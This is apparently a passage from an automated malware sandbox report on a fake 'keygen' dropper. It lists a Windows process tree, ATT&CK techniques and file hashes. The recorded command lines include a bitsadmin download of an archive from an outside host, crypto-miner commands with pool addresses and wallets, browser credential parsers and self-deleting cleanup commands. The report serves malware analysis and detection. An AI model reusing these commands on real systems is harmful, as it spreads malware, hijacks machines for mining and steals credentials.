                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                                                                                                                                                  parse.exe -f json -b chrome
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  PID:3496
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                                                                                                                                                  parse.exe -f json -b edge
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  PID:3744
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qgi52lvk.30y\toolspab1.exe & exit
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:4068
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\qgi52lvk.30y\toolspab1.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\qgi52lvk.30y\toolspab1.exe
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                PID:4088
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\qgi52lvk.30y\toolspab1.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\qgi52lvk.30y\toolspab1.exe
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                  PID:3084
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wcnly54u.ni2\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:2736
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\wcnly54u.ni2\SunLabsPlayer.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\wcnly54u.ni2\SunLabsPlayer.exe /S
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                PID:3388
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  PID:3484
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  PID:2676
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  PID:3100
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  PID:3320
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  PID:3096
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:1440
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Checks for any installed AV software in registry
                                                                                                                                                                                                    PID:3748
                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                                                    PID:1492
                                                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pB6oMHLTqeJri9TM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                    PID:1456
                                                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -px0ypAyw3wsOiPDD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:3788
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                    PID:1976
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:2252
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:3440
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:1044
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:3400
                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\dOETrP\dOETrP.dll" dOETrP
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:2928
                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\dOETrP\dOETrP.dll" dOETrP
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                  PID:1676
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:3020
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:3160
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:2292
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:1000
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1853.tmp\tempfile.ps1"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:1092
                                                                                                                                                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:1656
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jejz0mrp.awx\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:3968
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1l2f2jqm.qfh\inst.exe & exit
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:1224
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1l2f2jqm.qfh\inst.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1l2f2jqm.qfh\inst.exe
                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                              PID:3156
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tdwx5xdy.stl\c7ae36fa.exe & exit
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:3184
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tdwx5xdy.stl\c7ae36fa.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\tdwx5xdy.stl\c7ae36fa.exe
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                PID:3224
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                      PID:2820
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\94C3.tmp.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\94C3.tmp.exe"
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                        PID:1728
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\94C3.tmp.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\94C3.tmp.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                          PID:2216
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\97FE.tmp.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\97FE.tmp.exe"
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                        PID:1712
                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w22882@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:2236
                                                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w7427 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                            PID:3064
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:820
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                              PID:1092
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:1976
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                          PID:2652
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:2044
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:2736
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                                                                          keygen-step-3.exe
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:2344
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1652
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:1748
                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "191740493419268747-395856059-1095635470-160188524098608534312941372-976908373"
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:776
                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "967366841811898109-1230044163-962226276-348577635120818688-15775514151039047574"
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:3284
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E198.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\E198.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1960
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\E5CE.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\E5CE.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3488
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\EE28.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\EE28.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:944
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\Users\Admin\AppData\Local\4b85c177-907b-4e16-a489-3b1812a126c7" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:2848
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EE28.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\EE28.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:3688
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\976.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\976.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:2648
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:3004

                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1197

                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                      File Permissions Modification

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1222

                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1197

                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                      5
                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                      Software Discovery

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1518

                                                                                                                                                                                                                                      Security Software Discovery

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1063

                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                      4
                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                      5
                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1018

                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                      5
                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        15f0dd98904722a140f7bcfb5b3b0c95

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        4a026969e0dfbb33cca64e62845a47d8986a191f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a129a713ef03dde3556c8e5bd5e49cc28bff380baf175714ca48c7a02d867bc5

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        4e187dad101fef24ee634671b0c650996b6f80e1c4d1271355ec281477b19d6f7dca321bd8007ef353318ac55f4a17ada9071027ea2eca068395d6ac25f78455

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                                                                      • \??\pipe\crashpad_1100_SKLSCUWKMCHPFFUI
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                                                                                                      • memory/108-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/108-171-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/596-240-0x0000000004E20000-0x0000000004E21000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/652-73-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/724-71-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/832-221-0x0000000002046000-0x0000000002065000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        124KB

                                                                                                                                                                                                                                      • memory/832-220-0x0000000002040000-0x0000000002042000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                      • memory/884-238-0x0000000001B00000-0x0000000001B70000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                      • memory/884-200-0x0000000000860000-0x00000000008AB000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        300KB

                                                                                                                                                                                                                                      • memory/884-237-0x0000000000A30000-0x0000000000A7B000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        300KB

                                                                                                                                                                                                                                      • memory/884-201-0x0000000001190000-0x0000000001200000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                      • memory/908-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                      • memory/1100-79-0x0000000006B70000-0x0000000006B71000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/1124-178-0x0000000000000000-mapping.dmp
